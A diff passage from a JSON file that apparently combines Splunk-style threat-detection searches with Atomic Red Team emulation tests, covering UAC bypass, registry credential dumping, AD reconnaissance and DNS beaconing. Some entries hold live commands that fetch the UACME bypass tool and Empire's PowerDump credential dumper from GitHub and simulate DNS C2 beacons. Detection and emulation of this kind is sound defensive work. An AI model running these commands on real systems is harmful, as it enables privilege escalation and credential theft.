\"PathToAtomicsFolder\\..\\ExternalPayloads\\uacme\" -Force\nRemove-Item \"PathToAtomicsFolder\\..\\ExternalPayloads\\uacme.zip\" -Force\n" } ], "executor": { @@ -136519,9 +137126,9 @@ "dependency_executor_name": "powershell", "dependencies": [ { - "description": "UACME executable must exist on disk at specified location (#{uacme_exe})\n", + "description": "UACME executable must exist on disk at specified location (\"#{uacme_exe}\")\n", "prereq_command": "$tempPath = cmd /c echo #{uacme_exe}\nif (Test-Path \"$tempPath\") {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\uacme.zip\"\nExpand-Archive PathToAtomicsFolder\\..\\ExternalPayloads\\uacme.zip PathToAtomicsFolder\\..\\ExternalPayloads\\uacme -Force\nRemove-Item PathToAtomicsFolder\\..\\ExternalPayloads\\uacme.zip -Force\n" + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\uacme.zip\"\nExpand-Archive \"PathToAtomicsFolder\\..\\ExternalPayloads\\uacme.zip\" \"PathToAtomicsFolder\\..\\ExternalPayloads\\uacme\" -Force\nRemove-Item \"PathToAtomicsFolder\\..\\ExternalPayloads\\uacme.zip\" -Force\n" } ], "executor": { @@ -136547,9 +137154,9 @@ "dependency_executor_name": "powershell", "dependencies": [ { - "description": "UACME executable must exist on disk at specified location (#{uacme_exe})\n", + "description": "UACME executable must exist on disk at specified location (\"#{uacme_exe}\")\n", "prereq_command": "$tempPath = cmd /c echo #{uacme_exe}\nif (Test-Path \"$tempPath\") {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\uacme.zip\"\nExpand-Archive PathToAtomicsFolder\\..\\ExternalPayloads\\uacme.zip PathToAtomicsFolder\\..\\ExternalPayloads\\uacme -Force\nRemove-Item PathToAtomicsFolder\\..\\ExternalPayloads\\uacme.zip -Force\n" + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\uacme.zip\"\nExpand-Archive \"PathToAtomicsFolder\\..\\ExternalPayloads\\uacme.zip\" \"PathToAtomicsFolder\\..\\ExternalPayloads\\uacme\" -Force\nRemove-Item \"PathToAtomicsFolder\\..\\ExternalPayloads\\uacme.zip\" -Force\n" } ], "executor": { @@ -136575,9 +137182,9 @@ "dependency_executor_name": "powershell", "dependencies": [ { - "description": "UACME executable must exist on disk at specified location (#{uacme_exe})\n", + "description": "UACME executable must exist on disk at specified location (\"#{uacme_exe}\")\n", "prereq_command": "$tempPath = cmd /c echo #{uacme_exe}\nif (Test-Path \"$tempPath\") {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\uacme.zip\"\nExpand-Archive PathToAtomicsFolder\\..\\ExternalPayloads\\uacme.zip PathToAtomicsFolder\\..\\ExternalPayloads\\uacme -Force\nRemove-Item PathToAtomicsFolder\\..\\ExternalPayloads\\uacme.zip -Force\n" + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\uacme.zip\"\nExpand-Archive \"PathToAtomicsFolder\\..\\ExternalPayloads\\uacme.zip\" \"PathToAtomicsFolder\\..\\ExternalPayloads\\uacme\" -Force\nRemove-Item \"PathToAtomicsFolder\\..\\ExternalPayloads\\uacme.zip\" -Force\n" } ], "executor": { @@ -136603,9 +137210,9 @@ "dependency_executor_name": "powershell", "dependencies": [ { - "description": "UACME executable must exist on disk at specified location (#{uacme_exe})\n", + "description": "UACME executable must exist on disk at specified location (\"#{uacme_exe}\")\n", "prereq_command": "$tempPath = cmd /c echo #{uacme_exe}\nif (Test-Path \"$tempPath\") {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\uacme.zip\"\nExpand-Archive PathToAtomicsFolder\\..\\ExternalPayloads\\uacme.zip PathToAtomicsFolder\\..\\ExternalPayloads\\uacme -Force\nRemove-Item PathToAtomicsFolder\\..\\ExternalPayloads\\uacme.zip -Force\n" + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\uacme.zip\"\nExpand-Archive \"PathToAtomicsFolder\\..\\ExternalPayloads\\uacme.zip\" \"PathToAtomicsFolder\\..\\ExternalPayloads\\uacme\" -Force\nRemove-Item \"PathToAtomicsFolder\\..\\ExternalPayloads\\uacme.zip\" -Force\n" } ], "executor": { @@ -137057,7 +137664,7 @@ { "name": "Disable UAC Remote Restriction", "description": "This analytic is to detect a suspicious modification of registry to disable UAC remote restriction. This technique was well documented in Microsoft page where attacker may modify this registry value to bypassed UAC feature of windows host. This is a good indicator that some tries to bypassed UAC to suspicious process or gain privilege escalation.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path=\"*\\\\CurrentVersion\\\\Policies\\\\System*\" Registry.registry_value_name=\"LocalAccountTokenFilterPolicy\" Registry.registry_value_data=\"0x00000001\" ) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`| where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_uac_remote_restriction_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path=\"*\\\\CurrentVersion\\\\Policies\\\\System*\" Registry.registry_value_name=\"LocalAccountTokenFilterPolicy\" Registry.registry_value_data=\"0x00000001\" ) BY _time span=1h Registry.user Registry.dest Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`| where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_uac_remote_restriction_filter`", "tags": { "name": "Disable UAC Remote Restriction", "analytic_story": [ @@ -137072,7 +137679,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "modified/added/deleted registry entry $Registry.registry_path$ in $dest$", + "message": "Modified/added/deleted registry entry $registry_path$ in $dest$", "mitre_attack_id": [ "T1548.002", "T1548" @@ -137838,6 +138445,71 @@ ] } }, + { + "name": "Windows Bypass UAC via Pkgmgr Tool", + "description": "The following analytic identifies a potentially suspicious execution of the 'pkgmgr' process involving the use of an XML input file for package management. The 'pkgmgr' process, though deprecated in modern Windows systems, was historically used for managing packages. The presence of an XML input file raises concerns about the nature of the executed command and its potential impact on the system. Due to the deprecated status of 'pkgmgr' and the involvement of an XML file, this activity warrants careful investigation. XML files are commonly used for configuration and data exchange, making it crucial to ascertain the intentions and legitimacy of the command. To ensure system security, it is recommended to use up-to-date package management utilities, such as DISM or PowerShell's PackageManagement module, and exercise caution when executing commands involving potentially sensitive operations or files.", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = pkgmgr.exe Processes.process = \"*.xml*\" NOT(Processes.parent_process_path IN(\"*:\\\\windows\\\\system32\\\\*\", \"*:\\\\windows\\\\syswow64\\\\*\", \"*:\\\\Program Files*\")) by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process_path Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.original_file_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_bypass_uac_via_pkgmgr_tool_filter`", + "tags": { + "name": "Windows Bypass UAC via Pkgmgr Tool", + "analytic_story": [ + "Warzone RAT" + ], + "asset_type": "Endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Exploitation" + ], + "message": "A pkgmgr.exe executed with package manager xml input file on $dest$", + "mitre_attack_id": [ + "T1548.002" + ], + "nist": [ + "DE.AE" + ], + "observable": [ + { + "name": "user", + "type": "User", + "role": [ + "Victim" + ] + }, + { + "name": "dest", + "type": "Endpoint", + "role": [ + "Victim" + ] + } + ], + "risk_score": 9, + "security_domain": "endpoint", + "risk_severity": "low", + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1548.002", + "mitre_attack_technique": "Bypass User Account Control", + "mitre_attack_tactics": [ + "Defense Evasion", + "Privilege Escalation" + ], + "mitre_attack_groups": [ + "APT29", + "APT37", + "BRONZE BUTLER", + "Cobalt Group", + "Earth Lusca", + "Evilnum", + "MuddyWater", + "Patchwork", + "Threat Group-3390" + ] + } + ] + } + }, { "name": "WSReset UAC Bypass", "description": "This search is to detect a suspicious modification of registry related to UAC bypass. This technique is to modify the registry in this detection, create a registry value with the path of the payload and run WSreset.exe to bypass User account Control.", @@ -142972,7 +143644,7 @@ { "name": "Detect AzureHound Command-Line Arguments", "description": "The following analytic identifies the common command-line argument used by AzureHound `Invoke-AzureHound`. Being the script is FOSS, function names may be modified, but these changes are dependent upon the operator. In most instances the defaults are used. This analytic works to identify the common command-line attributes used. It does not cover the entirety of every argument in order to avoid false positives.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process IN (\"*invoke-azurehound*\") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_azurehound_command_line_arguments_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process IN (\"*invoke-azurehound*\") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.parent_process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_azurehound_command_line_arguments_filter`", "tags": { "name": "Detect AzureHound Command-Line Arguments", "analytic_story": [ @@ -143144,7 +143816,7 @@ { "name": "Detect AzureHound File Modifications", "description": "The following analytic is similar to SharpHound file modifications, but this instance covers the use of Invoke-AzureHound. AzureHound is the SharpHound equivilent but for Azure. It's possible this may never be seen in an environment as most attackers may execute this tool remotely. Once execution is complete, a zip file with a similar name will drop `20210601090751-azurecollection.zip`. In addition to the zip, multiple .json files will be written to disk, which are in the zip.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Filesystem where Filesystem.file_name IN (\"*-azurecollection.zip\", \"*-azprivroleadminrights.json\", \"*-azglobaladminrights.json\", \"*-azcloudappadmins.json\", \"*-azapplicationadmins.json\") by Filesystem.file_create_time Filesystem.process_id Filesystem.file_name Filesystem.file_path Filesystem.dest | `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_azurehound_file_modifications_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Filesystem where Filesystem.file_name IN (\"*-azurecollection.zip\", \"*-azprivroleadminrights.json\", \"*-azglobaladminrights.json\", \"*-azcloudappadmins.json\", \"*-azapplicationadmins.json\") by Filesystem.file_create_time Filesystem.process_id Filesystem.file_name Filesystem.file_path Filesystem.dest Filesystem.user | `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_azurehound_file_modifications_filter`", "tags": { "name": "Detect AzureHound File Modifications", "analytic_story": [ @@ -143461,7 +144133,7 @@ { "name": "Detect SharpHound File Modifications", "description": "SharpHound is used as a reconnaissance collector, ingestor, for BloodHound. SharpHound will query the domain controller and begin gathering all the data related to the domain and trusts. For output, it will drop a .zip file upon completion following a typical pattern that is often not changed. This analytic focuses on the default file name scheme. Note that this may be evaded with different parameters within SharpHound, but that depends on the operator. `-randomizefilenames` and `-encryptzip` are two examples. In addition, executing SharpHound via .exe or .ps1 without any command-line arguments will still perform activity and dump output to the default filename. Example default filename `20210601181553_BloodHound.zip`. SharpHound creates multiple temp files following the same pattern `20210601182121_computers.json`, `domains.json`, `gpos.json`, `ous.json` and `users.json`. Tuning may be required, or remove these json's entirely if it is too noisy. During traige, review parallel processes for further suspicious behavior. Typically, the process executing the `.ps1` ingestor will be PowerShell.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Filesystem where Filesystem.file_name IN (\"*bloodhound.zip\", \"*_computers.json\", \"*_gpos.json\", \"*_domains.json\", \"*_users.json\", \"*_groups.json\", \"*_ous.json\", \"*_containers.json\") by Filesystem.file_create_time Filesystem.process_id Filesystem.file_name Filesystem.file_path Filesystem.dest | `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_sharphound_file_modifications_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Filesystem where Filesystem.file_name IN (\"*bloodhound.zip\", \"*_computers.json\", \"*_gpos.json\", \"*_domains.json\", \"*_users.json\", \"*_groups.json\", \"*_ous.json\", \"*_containers.json\") by Filesystem.file_create_time Filesystem.process_id Filesystem.file_name Filesystem.file_path Filesystem.dest Filesystem.user| `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_sharphound_file_modifications_filter`", "tags": { "name": "Detect SharpHound File Modifications", "analytic_story": [ @@ -143497,7 +144169,7 @@ ] }, { - "name": "User", + "name": "user", "type": "User", "role": [ "Victim" @@ -143772,7 +144444,7 @@ { "name": "Domain Group Discovery with Adsisearcher", "description": "The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the `[Adsisearcher]` type accelerator being used to query Active Directory for domain groups. Red Teams and adversaries may leverage `[Adsisearcher]` to enumerate domain groups for situational awareness and Active Directory Discovery.", - "search": "`powershell` EventCode=4104 (Message = \"*[adsisearcher]*\" AND Message = \"*(objectcategory=group)*\" AND Message = \"*findAll()*\") | stats count min(_time) as firstTime max(_time) as lastTime by EventCode Message ComputerName User | `security_content_ctime(firstTime)` | `domain_group_discovery_with_adsisearcher_filter`", + "search": "`powershell` EventCode=4104 (Message = \"*[adsisearcher]*\" AND Message = \"*(objectcategory=group)*\" AND Message = \"*findAll()*\") | stats count min(_time) as firstTime max(_time) as lastTime by EventCode Message ComputerName User | rename ComputerName as dest |rename User as user | `security_content_ctime(firstTime)` | `domain_group_discovery_with_adsisearcher_filter`", "tags": { "name": "Domain Group Discovery with Adsisearcher", "analytic_story": [ @@ -144714,7 +145386,7 @@ { "name": "GetWmiObject Ds Group with PowerShell Script Block", "description": "The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-WmiObject` commandlet used with specific parameters . The `DS_Group` parameter leverages WMI to query for all domain groups. Red Teams and adversaries may leverage this commandlet to enumerate domain groups for situational awareness and Active Directory Discovery.", - "search": "`powershell` EventCode=4104 (ScriptBlockText=*Get-WmiObject* AND ScriptBlockText=\"*namespace root\\\\directory\\\\ldap*\" AND ScriptBlockText=\"*class ds_group*\") | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | `security_content_ctime(firstTime)` | `getwmiobject_ds_group_with_powershell_script_block_filter`", + "search": "`powershell` EventCode=4104 (ScriptBlockText=*Get-WmiObject* AND ScriptBlockText=\"*namespace root\\\\directory\\\\ldap*\" AND ScriptBlockText=\"*class ds_group*\") | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | rename Computer as dest | rename UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`|`getwmiobject_ds_group_with_powershell_script_block_filter`", "tags": { "name": "GetWmiObject Ds Group with PowerShell Script Block", "analytic_story": [ @@ -144727,7 +145399,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "Domain group discovery enumeration using PowerShell on $Computer$ by $UserID$", + "message": "Domain group discovery enumeration using PowerShell on $dest$ by $user$", "mitre_attack_id": [ "T1069", "T1069.002" @@ -145019,7 +145691,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "An increase of Windows Post Exploitation behavior has been detected on $affected_systems$", + "message": "An increase of Windows Post Exploitation behavior has been detected on $risk_object$", "mitre_attack_id": [ "T1012", "T1049", @@ -145035,7 +145707,7 @@ ], "observable": [ { - "name": "affected_systems", + "name": "risk_object", "type": "Hostname", "role": [ "Victim" @@ -147814,7 +148486,7 @@ { "name": "Mailsniper Invoke functions", "description": "This search is to detect known mailsniper.ps1 functions executed in a machine. This technique was seen in some attacker to harvest some sensitive e-mail in a compromised exchange server.", - "search": "`powershell` EventCode=4104 ScriptBlockText IN (\"*Invoke-GlobalO365MailSearch*\", \"*Invoke-GlobalMailSearch*\", \"*Invoke-SelfSearch*\", \"*Invoke-PasswordSprayOWA*\", \"*Invoke-PasswordSprayEWS*\",\"*Invoke-DomainHarvestOWA*\", \"*Invoke-UsernameHarvestOWA*\",\"*Invoke-OpenInboxFinder*\",\"*Invoke-InjectGEventAPI*\",\"*Invoke-InjectGEvent*\",\"*Invoke-SearchGmail*\", \"*Invoke-MonitorCredSniper*\", \"*Invoke-AddGmailRule*\",\"*Invoke-PasswordSprayEAS*\",\"*Invoke-UsernameHarvestEAS*\") | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `mailsniper_invoke_functions_filter`", + "search": "`powershell` EventCode=4104 ScriptBlockText IN (\"*Invoke-GlobalO365MailSearch*\", \"*Invoke-GlobalMailSearch*\", \"*Invoke-SelfSearch*\", \"*Invoke-PasswordSprayOWA*\", \"*Invoke-PasswordSprayEWS*\",\"*Invoke-DomainHarvestOWA*\", \"*Invoke-UsernameHarvestOWA*\",\"*Invoke-OpenInboxFinder*\",\"*Invoke-InjectGEventAPI*\",\"*Invoke-InjectGEvent*\",\"*Invoke-SearchGmail*\", \"*Invoke-MonitorCredSniper*\", \"*Invoke-AddGmailRule*\",\"*Invoke-PasswordSprayEAS*\",\"*Invoke-UsernameHarvestEAS*\") | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | rename Computer as dest | rename UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `mailsniper_invoke_functions_filter`", "tags": { "name": "Mailsniper Invoke functions", "analytic_story": [ @@ -147827,7 +148499,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "mailsniper.ps1 functions $ScriptBlockText$ executed on a $Computer$ by user $user$.", + "message": "mailsniper.ps1 functions $ScriptBlockText$ executed on a $dest$ by user $user$.", "mitre_attack_id": [ "T1114", "T1114.001" @@ -147837,7 +148509,7 @@ ], "observable": [ { - "name": "Computer", + "name": "dest", "type": "Endpoint", "role": [ "Victim" @@ -148183,7 +148855,7 @@ { "description": "PowerDump script must exist on disk at specified location", "prereq_command": "if (Test-Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\PowerDump.ps1\") {exit 0} else {exit 1} ", - "get_prereq_command": "Invoke-Webrequest -Uri \"https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1\" -UseBasicParsing -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\PowerDump.ps1\"" + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction ignore -Force | Out-Null\nInvoke-Webrequest -Uri \"https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1\" -UseBasicParsing -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\PowerDump.ps1\"" } ], "executor": { @@ -148614,7 +149286,7 @@ { "name": "Azure AD Privileged Authentication Administrator Role Assigned", "description": "The following analytic identifies the assignment of the Privileged Authentication Administrato role to an Azure AD user. Users in this role can set or reset authentication methods for any user in Azure Active Directory, including privileged roles like Global Administrators. Users with this role can change credentials for people who may have access to sensitive or private information or critical configuration inside and outside of Azure Active Directory. Changing the credentials of a user may mean the ability to assume that users identity and permissions. Red teams and adversaries alike may abuse this role to escalate their privileges.", - "search": " `azuread` \"body.operationName\"=\"Add member to role\" \"body.properties.targetResources{}.modifiedProperties{}.newValue\"=\"\\\"Privileged Authentication Administrator\\\"\" | rename body.properties.* as * | rename targetResources{}.userPrincipalName as userPrincipalName | rename initiatedBy.user.userPrincipalName as initiatedBy | stats values(userPrincipalName) by _time, initiatedBy, result, body.operationName | `azure_ad_privileged_authentication_administrator_role_assigned_filter`", + "search": " `azuread` \"operationName\"=\"Add member to role\" \"properties.targetResources{}.modifiedProperties{}.newValue\"=\"\\\"Privileged Authentication Administrator\\\"\" | rename properties.* as * | rename targetResources{}.userPrincipalName as userPrincipalName | rename initiatedBy.user.userPrincipalName as initiatedBy | stats values(userPrincipalName) as userPrincipalName by _time, initiatedBy, result, operationName | `azure_ad_privileged_authentication_administrator_role_assigned_filter`", "tags": { "name": "Azure AD Privileged Authentication Administrator Role Assigned", "analytic_story": [ @@ -148675,7 +149347,7 @@ { "name": "Attempted Credential Dump From Registry via Reg exe", "description": "Monitor for execution of reg.exe with parameters specifying an export of keys that contain hashed credentials that attackers may try to crack offline.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=reg* OR Processes.process_name=cmd* Processes.process=*save* (Processes.process=*HKEY_LOCAL_MACHINE\\\\Security* OR Processes.process=*HKEY_LOCAL_MACHINE\\\\SAM* OR Processes.process=*HKEY_LOCAL_MACHINE\\\\System* OR Processes.process=*HKLM\\\\Security* OR Processes.process=*HKLM\\\\System* OR Processes.process=*HKLM\\\\SAM*) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `attempted_credential_dump_from_registry_via_reg_exe_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=reg* OR Processes.process_name=cmd* Processes.process=*save* (Processes.process=*HKEY_LOCAL_MACHINE\\\\Security* OR Processes.process=*HKEY_LOCAL_MACHINE\\\\SAM* OR Processes.process=*HKEY_LOCAL_MACHINE\\\\System* OR Processes.process=*HKLM\\\\Security* OR Processes.process=*HKLM\\\\System* OR Processes.process=*HKLM\\\\SAM*) by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `attempted_credential_dump_from_registry_via_reg_exe_filter`", "tags": { "name": "Attempted Credential Dump From Registry via Reg exe", "analytic_story": [ @@ -148786,7 +149458,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "PowerShell was identified running a script to capture the SAM hive on endpoint $ComputerName$ by user $user$.", + "message": "PowerShell was identified running a script to capture the SAM hive on endpoint $ComputerName$ by user $User$.", "mitre_attack_id": [ "T1003.002", "T1003" @@ -148796,7 +149468,7 @@ ], "observable": [ { - "name": "user", + "name": "User", "type": "User", "role": [ "Victim" @@ -151180,7 +151852,7 @@ { "name": "Windows Service Creation Using Registry Entry", "description": "This analytic is to look for suspicious modification or creation of registry to have service entry. This technique is abused by adversaries or threat actor to persist, gain privileges in the machine or even lateral movement. This technique can be executed using reg.exe application or using windows API like for example the CrashOveride malware. This detection is a good indicator that a process is trying to create a service entry using registry ImagePath.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path=\"*\\\\SYSTEM\\\\CurrentControlSet\\\\Services*\" Registry.registry_value_name = ImagePath) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_service_creation_using_registry_entry_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path=\"*\\\\SYSTEM\\\\CurrentControlSet\\\\Services*\" Registry.registry_value_name = ImagePath) BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_service_creation_using_registry_entry_filter`", "tags": { "name": "Windows Service Creation Using Registry Entry", "analytic_story": [ @@ -151198,7 +151870,7 @@ "Exploitation", "Installation" ], - "message": "A Windows Service was created on a endpoint from $dest$", + "message": "A Windows Service was created on a endpoint from $dest$ using a registry entry", "mitre_attack_id": [ "T1574.011" ], @@ -152532,7 +153204,7 @@ ], "observable": [ { - "name": "Hostname", + "name": "host", "type": "Hostname", "role": [ "Victim" @@ -152584,7 +153256,7 @@ ], "observable": [ { - "name": "Hostname", + "name": "host", "type": "Hostname", "role": [ "Victim" @@ -153081,7 +153753,7 @@ { "name": "Windows Raw Access To Disk Volume Partition", "description": "This analytic is to look for suspicious raw access read to device disk partition of the host machine. This technique was seen in several attacks by adversaries or threat actor to wipe, encrypt or overwrite the boot sector of each partition as part of their impact payload for example the \"hermeticwiper\" malware. This detection is a good indicator that there is a process try to read or write on boot sector.", - "search": "`sysmon` EventCode=9 Device = \\\\Device\\\\HarddiskVolume* NOT (Image IN(\"*\\\\Windows\\\\System32\\\\*\", \"*\\\\Windows\\\\SysWOW64\\\\*\")) | stats count min(_time) as firstTime max(_time) as lastTime by Image Device ProcessGuid ProcessId EventDescription EventCode Computer | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_raw_access_to_disk_volume_partition_filter`", + "search": "`sysmon` EventCode=9 Device = \\\\Device\\\\HarddiskVolume* NOT (Image IN(\"*\\\\Windows\\\\System32\\\\*\", \"*\\\\Windows\\\\SysWOW64\\\\*\")) | stats count min(_time) as firstTime max(_time) as lastTime by dest signature signature_id process_guid process_name process_path Device | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_raw_access_to_disk_volume_partition_filter`", "tags": { "name": "Windows Raw Access To Disk Volume Partition", "analytic_story": [ @@ -153099,7 +153771,7 @@ "kill_chain_phases": [ "Actions on Objectives" ], - "message": "Process accessing disk partition $device$ in $dest$", + "message": "Process accessing disk partition $Device$ in $dest$", "mitre_attack_id": [ "T1561.002", "T1561" @@ -153109,7 +153781,7 @@ ], "observable": [ { - "name": "ComputerName", + "name": "dest", "type": "Hostname", "role": [ "Victim" @@ -153326,8 +153998,8 @@ ], "command_list": [ "for($i=0; $i -le 1000; $i++) { Resolve-DnsName -type \"TXT\" \"atomicredteam.$(Get-Random -Minimum 1 -Maximum 999999).127.0.0.1.xip.io\" -QuickTimeout}\n", - "Set-Location \n.\\T1071.004\\src\\T1071-dns-beacon.ps1 -Domain 127.0.0.1.xip.io -Subdomain atomicredteam -QueryType TXT -C2Interval 30 -C2Jitter 20 -RunTime 30\n", - "Set-Location \n.\\T1071.004\\src\\T1071-dns-domain-length.ps1 -Domain 127.0.0.1.xip.io -Subdomain atomicredteamatomicredteamatomicredteamatomicredteamatomicredte -QueryType TXT\n", + "Set-Location \"\"\n.\\T1071.004\\src\\T1071-dns-beacon.ps1 -Domain 127.0.0.1.xip.io -Subdomain atomicredteam -QueryType TXT -C2Interval 30 -C2Jitter 20 -RunTime 30\n", + "Set-Location \"\"\n.\\T1071.004\\src\\T1071-dns-domain-length.ps1 -Domain 127.0.0.1.xip.io -Subdomain atomicredteamatomicredteamatomicredteamatomicredteamatomicredte 